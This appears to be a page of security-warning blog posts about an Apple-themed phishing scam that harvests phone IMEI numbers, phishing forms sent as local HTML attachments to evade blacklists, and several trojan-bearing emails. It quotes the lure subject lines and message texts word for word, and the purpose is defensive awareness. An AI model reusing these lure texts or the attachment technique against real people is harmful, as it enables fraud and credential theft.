Just when I've written about a new kind of phishing which can bypass pretty much all known anti-phishing methods, along comes not so much another type, but another target.

Rather than targetting bank users, this one is targetting cellphone accounts.

 

Apple iPhone Phish Email ThumbThe email I received was an image, designed to look like a text email from Apple.  It claimed that registering your phone by following the link would extend your warranty by 1 year.

 

This is, of course, designed to look exactly like an Apple-themed email would.

 

When you click on the link in the image, or in fact, anywhere on the image at all, it takes you to a web page with a form on it.

Apple iPhone Phish Website FormThis form, again, is on an Apple themed page, with many links on the page going directly to Apple's website.  Undoubtedly, this page formatting code was lifted directly from Apple, and modified slightly to direct your data to the scammer.

The form asks for 4 pieces of information, although probably only 2 are really necessary to the scammer.

The most important one is the IMEI number.  This is the number which uniquely identifies your phone to the phone company.  Unfortunately, this number can be cloned to a new phone.  That's exactly what these phishers will be trying to do, I'd guess.

If they get a legitimate IMEI number, they can clone it to another phone, then burn up your local minutes, or make long distance calls around the world for free, and it won't be noticed for another month, until you get your next phonebill.  Add in a couple of weeks or more of haggling with the phone company, and they've probably got two months of free phonecalls.

It could very well be that they're selling these cloned phones on the black market, stating that service is paid for for a number of months.

It's also possible that they would use these cloned phones to listen to your phone conversations, hoping to gain more personal information to use for more serious identity theft, although that would be much more labour intensive than I would think would be worthwhile.

Phishing is the practice of sending fake emails, claiming to be from a bank, credit card company, or some other such organization that has personal information.

These emails usually claim that your account has been limited, or information needs to be updated, or some other reason that you need to go log into the site and correct the problem.

The email then contains a link taking you to the site purportedly belonging to the organization, which is, in fact, a site owned by the scammer.  Your information, credit card details, bank username and password, or other private information is then given to the scammer, if you fill out the form and click the submit button.

To combat this activity, security industry players have created databases of known phishing sites, such as http://www.phishtank.com, which web browsers and security software can use to verify sites that you visit.  These databases have a method to submit new phishing sites, which I have done myself, which are then checked and verified by other users, and in turn used to warn visitors to the phishing site that it is not legitimate.

As with anything in the security industry, though, this is a game of oneupmanship.  To bypass the online databases of phishing sites, the phishers are now using a new tactic, which I've noticed a couple of times in the past month.  Undoubtedly, this method will grow in popularity, due to the difficulty of controlling it.

What the phishers are now doing, instead of emailing a link to a fake online login form, is to email the entire form itself.  The form shows as an attachment to an email, which, when clicked, opens in your web browser, just the same as a regular phishing site.  What is different, though, is instead of being loaded from http://www.phishers.com/FakePayPalLogin/, enabling your browser's phishing protection to warn you, it's loaded directly from your own computer.

A local file, loaded from your own computer, is assumed to be safe. In fact, a local file has to be assumed safe, or various components of Windows would break, due to the way Microsoft has chosen to integrate these components.

The form is a pure HTML document, like a web page, which simply directs the form data to a malicious server, set up to harvest data from victims.  In one case, I've seen it encoded using Javascript to be difficult to analyze.

At this point, I can't think of a way to handle this.  The only real way to find dangerous files on your own computer is through antivirus and antispyware software.  But since the form is simply an HTML web page, with no dangerous content, it's very difficult, if not impossible, for antivirus software to detect.

It will be interesting to see what the security industry comes up with to combat this, and I'll be working on the problem myself, also.  In the meantime, keep an eye out for such attachments supposedly coming from these types of sites.

Another new email virus is making the rounds of inboxes.

This one comes with a subject line of:

 

get back to my office for more details

 

and the body text is:

 

Please read the attached letter and get back to my office for more details to
proceed further.

Thanks and have a very nice day.

 

The attachment is a zip file of 28 kilobytes.

This one has a reasonably good detection rate at virustotal.com, of 75%.

 

virustotal.com scan results

 

All the major antivirus engines detect it, with the exception of Sunbelt (producer of CounterSpy).

That means anybody with up to date antivirus should be safe, provided it's working properly.

 

This trojan will turn your computer into a spam relay, and steal email addresses from various files on your computer.  There is the possibility of other activities, as it does embed itself into Internet Explorer, meaning it could be used to steal usernames and passwords for sensitive sites like banks.  It also downloads and executes programs from Internet servers, so it could easily upgrade its capabilities in future.

 

If you get an email claiming that you've won a Macbook Air, don't believe it.

It's another email virus; this time, a variant of the Zbot trojan.

 

There are other reports on the Internet about a virus-laden message with the exact same text, but it's not the same virus.  That one is detected by over 70% of virus scanners.  This one is detected by only 30%.

 

The subject line of the email is short, merely:

 

Congratulations

 

The body text of the email is:

 

Congratulations!! You have won todays Macbook Air.
Please open attached file and see datails.

 

Notice the spelling mistake in "datails."

 

The attachment shows as a 103 Kilobyte zip file.

 

 

This trojan appears to be an encrypted version of the original ZBot, which was designed to steal passwords for banking and other financial sites.

 

 

Another email virus/trojan, only this time, it's designed to steal banking information.

 

This one arrives in an email with the subject line:


UPS Invoice 5305325782943

and has the body text:


Unfortunately we were not able to deliver postal package you send on October the 1st
in time because the recipients address is not correct.
Please print out the invoice cioy attached and collect the package at our office

Your UPS

 

Although at first glance, this looks to be another variant of the FakeRean trojan discussed here, the malicious payload is completely different.  This one is designed to monitor keystrokes entered into certain bank websites.  This will, of course, allow capture of usernames and passwords, which are then transferred to a server under the control of the trojan author.

This will allow the attacker to log in to your bank account, and transfer money out.

 

More Articles ...

  1. United Parcel Service Fedex Tracking N5421062126
  2. Microsoft Outlook Notification for the user@domain.com
  3. FakeRean virus - A new settings file for the user@domain.com has just been released
  4. Subject: You've received a postcard - 123greetings.com greeting card virus
Page 2 of 3

Computer Services